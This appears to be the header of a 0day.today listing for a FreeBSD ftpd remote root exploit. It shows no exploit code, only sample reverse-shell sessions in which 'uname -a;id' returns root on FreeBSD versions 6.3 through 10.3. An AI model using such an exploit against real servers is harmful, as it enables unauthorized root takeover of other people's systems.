Full title: FreeBSD ftpd Remote Root Exploit Category: remote exploits Platform: freebsd needs user account inside a chroot. ''' example reverse shells: [root@r00tbox /]# uname -a;id; uname -a;id; FreeBSD r00tbox 10.0-RELEASE FreeBSD 10.0-RELEASE #0 r260789: Thu Jan 16 22:34:59 UTC 2014 root@snap.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64 uid=0(root) gid=0(wheel) groups=0(wheel) [root@r00tbox /]# # uname -a;id; FreeBSD r00tbox 10.3-RELEASE FreeBSD 10.3-RELEASE #0 r297264: Fri Mar 25 03:51:29 UTC 2016 root@releng1.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC i386 uid=0(root) gid=0(wheel) groups=0(wheel) # uname -a;id; FreeBSD r00tbox 10.3-RELEASE FreeBSD 10.3-RELEASE #0 r297264: Fri Mar 25 02:10:02 UTC 2016 root@releng1.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64 uid=0(root) gid=0(wheel) groups=0(wheel) # uname -a;id; FreeBSD r00tbox 9.3-RELEASE FreeBSD 9.3-RELEASE #0 r268512: Thu Jul 10 23:44:39 UTC 2014 root@snap.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64 uid=0(root) gid=0(wheel) groups=0(wheel) #uname -a;id; FreeBSD r00tbox 9.2-RELEASE FreeBSD 9.2-RELEASE #0 r255898: Thu Sep 26 22:50:31 UTC 2013 root@bake.isc.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64 uid=0(root) gid=0(wheel) groups=0(wheel) Ncat: Connection from 192.168.178.46:50444. sh: can't access tty; job control turned off # uname -a;id; FreeBSD r00tbox 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64 uid=0(root) gid=0(wheel) groups=0(wheel) # sh: can't access tty; job control turned off # uname -a;id; FreeBSD xxx.hostname 7.3-RELEASE FreeBSD 7.3-RELEASE #0: Sun Mar 21 05:25:24 UTC 2010 root@driscoll.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64 uid=0(root) gid=0(wheel) groups=0(wheel),1001(test2) sh: can't access tty; job control turned off # uname -a; FreeBSD r00tbox.fritz.box 7.1-RELEASE FreeBSD 7.1-RELEASE #0: Thu Jan 1 08:58:24 UTC 2009 root@driscoll.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64 sh: can't access tty; job control turned off # uname -a;id; FreeBSD r00tbox.fritz.box 6.4-RELEASE FreeBSD 6.4-RELEASE #0: Wed Nov 26 08:21:48 UTC 2008 root@palmer.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64 uid=0(root) gid=0(wheel) groups=0(wheel),1001(test2) # # uname -a; FreeBSD r00tbox.fritz.box 6.4-RELEASE FreeBSD 6.4-RELEASE #0: Wed Nov 26 11:43:51 UTC 2008 root@dessler.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 # id uid=0(root) gid=0(wheel) groups=0(wheel),1001(test2) # uname -a;id; FreeBSD r00tbox.fritz.box 6.3-RELEASE FreeBSD 6.3-RELEASE #0: Wed Jan 16 04:18:52 UTC 2008 root@dessler.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 uid=0(root) gid=0(wheel) groups=0(wheel),1003(test2) # 0day.today @ http://0day.today/